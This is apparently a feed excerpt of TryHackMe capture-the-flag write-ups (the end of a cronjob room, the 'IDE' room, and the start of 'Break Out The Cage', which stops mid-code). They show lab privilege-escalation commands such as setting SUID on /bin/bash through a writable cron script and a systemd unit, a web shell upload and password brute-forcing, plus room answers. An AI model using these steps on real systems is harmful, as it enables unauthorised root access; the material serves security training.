&lt;pre class="highlight shell"&gt;&lt;code&gt;01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The binary decodes to &lt;code&gt;iconvertedmypasswordtobinary&lt;/code&gt;. Logging in via SSH as &lt;code&gt;boring&lt;/code&gt; and reading &lt;code&gt;/home/boring/user.txt&lt;/code&gt; reveals the user flag.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The flag looks like a Caesar or Vigenère cipher. &lt;a href="https://www.boxentriq.com/analysis/cipher-identifier" rel="noopener noreferrer"&gt;Cipher Identifier&lt;/a&gt; identifies it as Caesar. Trying each shift manually, shift 13 decodes it to &lt;code&gt;flag{REDACTED}&lt;/code&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;ROT13 is simply the same as Ceasar cipher with 13 shifts.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The room description mentions vulnerable cronjobs, so &lt;code&gt;/etc/crontab&lt;/code&gt; is checked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;    &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;   root    &lt;span class="nb"&gt;cd&lt;/span&gt; /var/www/ &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;sudo &lt;/span&gt;bash .mysecretcronjob.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Root runs &lt;code&gt;.mysecretcronjob.sh&lt;/code&gt; every minute. The file is writable and owned by &lt;code&gt;boring&lt;/code&gt;, so a SUID bit can be set on &lt;code&gt;/bin/bash&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo5gbvs23j93ompq9ck9s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo5gbvs23j93ompq9ck9s.png" alt="cron file" width="627" height="52"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The following payload is appended to the script.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'chmod +s /bin/bash'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /var/www/.mysecretcronjob.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After the cronjob fires, running&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash &lt;span class="nt"&gt;-p&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;gives a root shell.&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 1
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Using GoBuster, find flag 1.&lt;/code&gt; Answer: &lt;code&gt;flag{REDACTED}&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 2
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Further enumerate the machine, what is flag 2?&lt;/code&gt; Answer: &lt;code&gt;flag{REDACTED}&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 3
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Crack the hash with easypeasy.txt, What is the flag 3?&lt;/code&gt; Answer: &lt;code&gt;flag{REDACTED}&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 4
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is the hidden directory?&lt;/code&gt; Answer: &lt;code&gt;/n0th1ng3ls3m4tt3r&lt;/code&gt; (PEAK Reference to &lt;a href="https://www.youtube.com/watch?v=tAGnKpE4NCI" rel="noopener noreferrer"&gt;Metallica&lt;/a&gt;)&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 5
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Using the wordlist that provided to you in this task crack the hash what is the password?&lt;/code&gt; Answer: &lt;code&gt;mypasswordforthatjob&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 6
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is the password to login to the machine via SSH?&lt;/code&gt; Answer: &lt;code&gt;iconvertedmypasswordtobinary&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 7
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is the user flag?&lt;/code&gt; Answer: &lt;code&gt;flag{REDACTED}&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 8
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is the root flag?&lt;/code&gt; Answer: &lt;code&gt;flag{REDACTED}&lt;/code&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
    <item>
      <title>IDE - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Fri, 12 Jun 2026 19:46:13 +0000</pubDate>
      <link>https://dev.to/laach_/ide-thm-1604</link>
      <guid>https://dev.to/laach_/ide-thm-1604</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Easy🟩&lt;br&gt;
Link: &lt;a href="https://tryhackme.com/room/ide" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 45 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description: &lt;code&gt;An easy box to polish your enumeration skills!&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Recon
&lt;/h2&gt;

&lt;p&gt;Casually &lt;code&gt;nmap&lt;/code&gt; scan&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap 10.113.154.9 &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; scan.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F27fp18fch3rl3izuvz5j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F27fp18fch3rl3izuvz5j.png" alt="nmap" width="800" height="750"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Scan reveals:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;21/tcp - FTP&lt;/li&gt;
&lt;li&gt;22/tcp - SSH&lt;/li&gt;
&lt;li&gt;80/tcp - HTTP&lt;/li&gt;
&lt;li&gt;62337/tcp - HTTP&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Shell as www-data
&lt;/h2&gt;

&lt;p&gt;Nmap revealed that FTP allows anonymous login. At first look it seems empty.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5j5aw400kxx9jbi81r1l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5j5aw400kxx9jbi81r1l.png" alt="ftp" width="557" height="116"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In Linux only &lt;code&gt;.&lt;/code&gt; means this directory and &lt;code&gt;..&lt;/code&gt; means one directory back but &lt;code&gt;...&lt;/code&gt; doesn't mean anything here. It's just a directory. Inside it there is a file named &lt;code&gt;-&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9vwy6ed2e8oiwdh34f43.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9vwy6ed2e8oiwdh34f43.png" alt="ftp file" width="540" height="197"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After downloading the file, name was changed to avoid issues with tools such as &lt;code&gt;cat&lt;/code&gt;. Renamed using:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mv&lt;/span&gt; &lt;span class="s1"&gt;'-'&lt;/span&gt; ftp.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This allows &lt;code&gt;cat&lt;/code&gt; to read the file properly.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxb96ka58k06wuuuy79rr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxb96ka58k06wuuuy79rr.png" alt="file" width="780" height="100"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This tells &lt;code&gt;John&lt;/code&gt; password was set to default. Later, going to the website on port 80 and running Feroxbuster there wasn't anything. Next was HTTP on port 62337. There was a login page by default. Knowing that there is a user &lt;code&gt;John&lt;/code&gt; with a default password, Turbo Intruder was run in Burp with &lt;code&gt;rockyou.txt&lt;/code&gt; on the login endpoint. There was only one response with an enormous Anomaly rank.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffrzfhhk12nfoliujgaey.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffrzfhhk12nfoliujgaey.png" alt="intruder" width="798" height="77"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After logging in, there was Codiad. It's a lightweight web IDE. Each new project is stored in &lt;code&gt;workspace/[NAME]&lt;/code&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;After logging in there was one project called 'CloudCall'. It was stored in a different folder. Only new projects are stored in &lt;code&gt;workspace/[NAME]&lt;/code&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;After creating a new project, &lt;a href="https://github.com/flozz/p0wny-shell.git" rel="noopener noreferrer"&gt;p0wny-shell&lt;/a&gt; was uploaded. It was accessible at &lt;code&gt;workspace/[NAME]/p0wny-shell.php&lt;/code&gt;. To get a stable shell, &lt;a href="https://github.com/brightio/penelope" rel="noopener noreferrer"&gt;penelope&lt;/a&gt; was used. It's an awesome Linux shell handler.&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as drac
&lt;/h2&gt;

&lt;p&gt;After gaining access as www-data, linpeas was transferred and run. It revealed a MySQL password in &lt;code&gt;drac&lt;/code&gt; user bash history.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9memdugfgvj92v1nnnmj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9memdugfgvj92v1nnnmj.png" alt="history" width="326" height="51"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Linpeas output showed that MySQL was not running on any port. The password was tried to log in as the user , it worked.&lt;/p&gt;

&lt;p&gt;Flag located at: &lt;code&gt;/home/drac/user.txt&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as root
&lt;/h2&gt;

&lt;p&gt;Knowing the password, the following was run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It revealed:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvyyrthuqzv9onpxwmqhn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvyyrthuqzv9onpxwmqhn.png" alt="sudo" width="800" height="125"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This doesn't allow doing anything except restarting &lt;code&gt;vsftpd&lt;/code&gt;. Linpeas was run again. It showed write permission on &lt;code&gt;/lib/systemd/system/vsftpd.service&lt;/code&gt;. This file defines what gets executed on actions such as reload, start, and more. It looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight toml"&gt;&lt;code&gt;&lt;span class="nn"&gt;[Unit]&lt;/span&gt;
&lt;span class="py"&gt;Description&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;vsftpd&lt;/span&gt; &lt;span class="err"&gt;FTP&lt;/span&gt; &lt;span class="err"&gt;daemon&lt;/span&gt;
&lt;span class="py"&gt;After&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;network.target&lt;/span&gt;

&lt;span class="nn"&gt;[Service]&lt;/span&gt;
&lt;span class="py"&gt;Type&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;simple&lt;/span&gt;
&lt;span class="py"&gt;ExecStart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;/usr/sbin/vsftpd&lt;/span&gt; &lt;span class="err"&gt;/etc/vsftpd.conf&lt;/span&gt;
&lt;span class="py"&gt;ExecReload&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;/bin/kill&lt;/span&gt; &lt;span class="err"&gt;-HUP&lt;/span&gt; &lt;span class="err"&gt;$MAINPID&lt;/span&gt;
&lt;span class="py"&gt;Restart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;on-failure&lt;/span&gt;
&lt;span class="py"&gt;RestartSec&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="err"&gt;s&lt;/span&gt;

&lt;span class="nn"&gt;[Install]&lt;/span&gt;
&lt;span class="py"&gt;WantedBy&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;multi-user.target&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When restarting, the service gets turned off and on. The service manager executes the value of &lt;code&gt;ExecStart&lt;/code&gt;. Changing it to:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight toml"&gt;&lt;code&gt;&lt;span class="py"&gt;ExecStart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;chmod&lt;/span&gt; &lt;span class="err"&gt;+s&lt;/span&gt; &lt;span class="err"&gt;/bin/bash&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;will trigger this command on restart. However, trying to restart vsftpd immediately results in this error:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Warning: The unit file, source configuration file or drop-ins of vsftpd.service changed on disk. Run 'systemctl daemon-reload' to reload units.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means systemd doesn't recognize the new file. It uses the one in RAM with the old value. Reloading is required:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;systemctl daemon-reload
&lt;span class="nb"&gt;sudo&lt;/span&gt; /usr/sbin/service vsftpd restart
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This reloads systemd and restarts vsftpd, executing the command.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;Don't paste both at once because the first one gives a password prompt. Pasting both may interrupt it.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Flag located at: &lt;code&gt;/root/root.txt&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Bonus
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Vulnerable Codiad
&lt;/h3&gt;

&lt;p&gt;Codiad 2.8.4 is vulnerable to authenticated RCE. The exploit was tried but didn't work properly, so a shell file was uploaded instead.&lt;/p&gt;

&lt;p&gt;Info about CVE: &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2018-19423" rel="noopener noreferrer"&gt;CVE-2018-19423&lt;/a&gt; &lt;br&gt;
Exploit on ExploitDB: &lt;a href="https://www.exploit-db.com/exploits/49907" rel="noopener noreferrer"&gt;Exploit&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
    <item>
      <title>Break Out The Cage - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Fri, 12 Jun 2026 15:25:31 +0000</pubDate>
      <link>https://dev.to/laach_/break-out-the-cage-thm-2af6</link>
      <guid>https://dev.to/laach_/break-out-the-cage-thm-2af6</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Easy🟩&lt;br&gt;
Link: &lt;a href="https://tryhackme.com/room/breakoutthecage1" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 45 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description: &lt;code&gt;Help Cage bring back his acting career and investigate the nefarious goings on of his agent!&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Recon
&lt;/h2&gt;

&lt;p&gt;Casually &lt;code&gt;nmap&lt;/code&gt; scan.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap 10.114 188.39 &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; scan.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F957a9buyzbaugio97f3j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F957a9buyzbaugio97f3j.png" alt="Nmap scan" width="800" height="562"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Scan reveals:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;21/tcp - FTP&lt;/li&gt;
&lt;li&gt;22/tcp - SSH&lt;/li&gt;
&lt;li&gt;80/tcp - HTTP&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Shell as &lt;code&gt;Weston&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;Logging to FTP as anonymous. Scan revealed file &lt;code&gt;dad_tasks&lt;/code&gt;. Using &lt;code&gt;get&lt;/code&gt; in FTP we can download it. Reading the file shows text encoded in base64.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3i24jd5mgpw0dq3qjewg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3i24jd5mgpw0dq3qjewg.png" alt="Base64 string" width="798" height="39"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Running this command decodes the string:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"STRING-HERE"&lt;/span&gt; | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After decoding, it still looked weird and unreadable. It looks like a Caesar cipher or Vigenère.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figv6ksrf7c6umz9tlzaz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figv6ksrf7c6umz9tlzaz.png" alt="Vigenère cipher" width="663" height="198"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Best tool for cipher identification is &lt;a href="https://www.boxentriq.com/analysis/cipher-identifier" rel="noopener noreferrer"&gt;Cipher Identifier&lt;/a&gt;. It identifies the most probable cipher and even suggests decoding tools. After running it, the text is identified as Vigenère. Running it through the decode tool gives something almost readable, but words are stuck together due to no spaces. Go to &lt;a href="https://gchq.github.io/CyberChef/" rel="noopener noreferrer"&gt;CyberChef&lt;/a&gt;, select Vigenère decode, provide the identified key and paste the ciphered text.&lt;/p&gt;

&lt;p&gt;Decoded text looks like:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyh3dcs3xlj75z415o9r6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyh3dcs3xlj75z415o9r6.png" alt="Decoded string" width="800" height="218"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There is a weird string. Maybe it's a password, but for who?&lt;/p&gt;

&lt;p&gt;Going to the website hosted on port 80 reveals a pseudo diary. Reading it reveals a son named &lt;code&gt;Weston&lt;/code&gt;. The note on FTP was written by Weston for his dad with an "In case I forget" message, so the weird string may be Weston's own password.&lt;/p&gt;

&lt;p&gt;Trying to log in as Weston via SSH using this string as a password works.&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as Cage
&lt;/h2&gt;

&lt;p&gt;At the beginning, pspy64 was transferred onto the machine and ran in a second terminal logged on the same machine. Then:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It shows that &lt;code&gt;weston&lt;/code&gt; can run &lt;code&gt;/usr/bin/bees&lt;/code&gt; as root.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjh6fmp7bhs9qt235p4dk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjh6fmp7bhs9qt235p4dk.png" alt="Bees file" width="685" height="130"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After checking the file, it turned out it couldn't be edited and the script didn't ask for any input. It simply called &lt;code&gt;wall&lt;/code&gt; with some hardcoded text. This script was a rabbit hole.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;&lt;code&gt;wall&lt;/code&gt; stands for "write all", basically prints a message to every logged-in user with an open terminal.&lt;/em&gt; &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;While checking pspy64 output, a cronjob running as UID=1000 (Cage) was spotted, executing every 3 minutes.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftyos6cx3dwmusn7wsbj3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftyos6cx3dwmusn7wsbj3.png" alt="cron command in pspy64" width="797" height="89"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After investigating &lt;code&gt;/opt/.dads_scripts/spread_the_quotes.py&lt;/code&gt;, it turned out the script was concatenating a random quote with &lt;code&gt;wall&lt;/code&gt;. It looked like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;#!/usr/bin/env python
&lt;/span&gt;
